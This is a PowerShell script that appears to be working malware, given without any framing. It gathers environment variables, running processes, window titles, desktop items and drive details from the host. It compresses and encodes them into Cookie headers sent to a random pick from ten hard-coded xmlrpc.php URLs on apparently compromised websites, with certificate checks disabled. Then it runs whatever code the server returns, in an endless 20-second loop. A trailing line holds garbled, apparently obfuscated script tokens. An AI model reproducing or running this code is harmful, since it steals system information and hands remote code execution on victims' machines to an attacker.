function HMgJEQS($aBnmN) {
    $EkXc = "486865D9C4";

    function qdowk($IWosJx) {
        $sXrR = [System.IO.MemoryStream]::new();
        $OBNVv = [System.IO.StreamWriter]::new((New - Object System.IO.Compression.GZipStream($sXrR, [System.IO.Compression.CompressionMode]::Compress)));
        $OBNVv.Write([String]::Join("|!", $IWosJx));
        $OBNVv.Close();
        [System.Convert]::ToBase64String($sXrR.ToArray())
    }
    $xQKzkaf = qdowk((dir env: | where {
        $_.value.Length - lt 100
    } | % {
        ($_.name + "^" + $_.value)
    }) + ("OSWMI^" + (Get - WmiObject Win32_OperatingSystem).caption));
    $CGotFp = qdowk(gps | select name - unique | % {
        $_.name
    });
    $MYYvNch = qdowk(gps | where {
        $_.mainwindowtitle
    } | % {
        $_.name + "^" + $_.mainwindowtitle
    });
    $zVqcO = qdowk(((new - object - com shell.application).Namespace(0)).Items() | % {
        if ($_.IsLink) {
            "0" + $_.Name
        }
        elseif($_.IsFolder) {
            "1" + $_.Name
        }
        elseif($_.IsFileSystem) {
            "2" + [IO.Path]::GetFileName($_.Path)
        } else {
            "3" + $_.Name
        }
    });
    $nGmxy = qdowk(gdr | where {
        $_.free - gt 50000
    } | % {
        $_.name + "^" + $_.used
    });
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
    [Net.ServicePointManager]::ServerCertificateValidationCallback = {
        $true
    };
    $eqrYuV = [System.Net.WebRequest]::Create($aBnmN);
    $eqrYuV.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36";
    $eqrYuV.KeepAlive = 0;
    $eqrYuV.Headers.Add("Cookie: $EkXc=$xQKzkaf; $EkXc`1=$CGotFp; $EkXc`2=$MYYvNch; $EkXc`3=$zVqcO; $EkXc`4=$nGmxy");
    $qEuY = new - object System.IO.StreamReader $eqrYuV.GetResponse().GetResponseStream();
    $smAjBW = ($qEuY.ReadToEnd()) - split $EkXc;
    if ($smAjBW.Count - eq 3) {
        iex($smAjBW[1] - replace "\^", "");
    }
}
while (1) {
    try {
        HMgJEQS(@("https://ifthenpay.com/xmlrpc.php", "https://curlytales.com/xmlrpc.php", "https://customkiosks.co.uk/xmlrpc.php", "https://hommad.ru/xmlrpc.php", "https://fujitsu-airco.be/xmlrpc.php", "https://thinksaltlakecity.com/xmlrpc.php", "https://pornnudex.com/xmlrpc.php", "http://arce-ingenieria.com/wordpress/xmlrpc.php", "https://gatoro.co/xmlrpc.php", "https://indiarag.com/xmlrpc.php") | Get - Random)
    } catch {};
    sleep - s 20
}
wRiTElinEslEEPcscript\\ OPeNslicewscRIPT.SHelLSHEll.AppLicATIONEXeCcrEATEoBjeCtSTdInfulLNAmePoWerSHeLLsHELlExECUTEScrIpTFUllNaMElastIndexOfsearchsubstrcscript.exe ""
""